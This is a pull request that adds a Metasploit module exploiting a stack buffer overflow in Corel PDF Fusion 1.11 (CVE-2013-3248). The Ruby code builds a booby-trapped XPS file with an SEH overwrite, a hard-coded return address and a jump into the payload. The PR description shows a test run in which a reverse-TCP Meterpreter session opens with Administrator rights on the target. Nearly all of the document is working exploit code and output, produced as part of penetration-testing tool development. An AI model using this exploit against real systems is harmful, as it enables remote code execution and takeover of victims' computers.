### PR TITLE
Add module for CVE-2013-3248

### DIFF
--- a/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb
+++ b/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb
@@ -1,0 +1,99 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex/zip'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::FILEFORMAT
+	include Msf::Exploit::Remote::Seh
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Corel PDF Fusion Stack Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a stack-based buffer overflow vulnerability in version 1.11 of
+				Corel PDF Fusion. The vulnerability exists while handling XPS files with long entry
+				names. In order for the payload to be executed, an attacker must convince the target
+				user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, an
+				attacker can execute arbitrary code as the target user.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Kaveh Ghaemmaghami', # Vulnerability discovery
+					'juan vazquez' # Metasploit module
+				],
+			'References'     =>
+				[
+					[ 'CVE', '2013-3248' ],
+					[ 'OSVDB', '94933' ],
+					[ 'BID', '61010' ],
+					[ 'URL', 'http://secunia.com/advisories/52707/' ]
+				],
+			'Platform'       => [ 'win' ],
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'Space' => 4000
+				},
+			'Targets'        =>
+				[
+					# Corel PDF Fusion 1.11 (build 2012/04/25:21:00:00)
+					# CorelFusion.exe 2.6.2.0
+					# ret from unicode.nls # call dword ptr ss:[ebp+0x30] # tested over Windows XP SP3 updates
+					[ 'Corel PDF Fusion 1.11 / Windows XP SP3', { 'Ret' => 0x00280b0b, 'Offset' => 4640 } ]
+				],
+			'DisclosureDate' => 'Jul 08 2013',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('FILENAME', [ true, 'The output file name.', 'msf.xps'])
+			], self.class)
+
+	end
+
+
+	def exploit
+		template = [
+			"[Content_Types].xml",
+			"_rels/.rels",
+			"docProps/thumbnail.jpeg",
+			"docProps/core.xml",
+			"FixedDocSeq.fdseq",
+			"Documents/1/Pages/_rels/1.fpage.rels",
+			"Documents/1/_rels/FixedDoc.fdoc.rels",
+			"Documents/1/FixedDoc.fdoc",
+			"Documents/1/Structure/Fragments/1.frag",
+			"Documents/1/Structure/DocStructure.struct",
+			"Documents/1/Pages/1.fpage",
+		]
+
+		xps = Rex::Zip::Archive.new
+		template.each do |k|
+			xps.add_file(k, rand_text_alpha(10 + rand(20)))
+		end
+
+		resources_length = "Resources/".length
+		sploit = "Resources/"
+		sploit << payload.encoded
+		sploit << rand_text(target['Offset'] - sploit.length)
+		sploit << generate_seh_record(target.ret)
+		sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset'] + 8 - resources_length}").encode_string # 8 => seh_record length
+		sploit << rand_text(1500) # Trigger exception
+
+		xps.add_file(sploit, rand_text_alpha(10 + rand(20)))
+
+		print_status("Creating '#{datastore['FILENAME']}' file...")
+		file_create(xps.pack)
+	end
+
+end


### PR DESCRIPTION
Tested successfully with Corel PDF Fusion 1.11 / Windows XP SP3.

Tested with the trial downloaded from: http://www.corel.com/corel/product/index.jsp?pid=prod4100140&cid=catalog20038&segid=1105&storeKey=us&languageCode=en

At the time of writing the available trial is the vulnerable version still. If something changes don't hesitate to ask me for a vulnerable version installer.

Test results:

```
msf > use exploit/windows/fileformat/corelpdf_fusion_bof 
msf exploit(corelpdf_fusion_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(corelpdf_fusion_bof) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(corelpdf_fusion_bof) > exploit

[*] Creating 'msf.xps' file...
[+] msf.xps stored at /Users/juan/.msf4/local/msf.xps
msf exploit(corelpdf_fusion_bof) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1511) at 2013-07-11 12:29:08 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 1 closed.  Reason: User exit

```
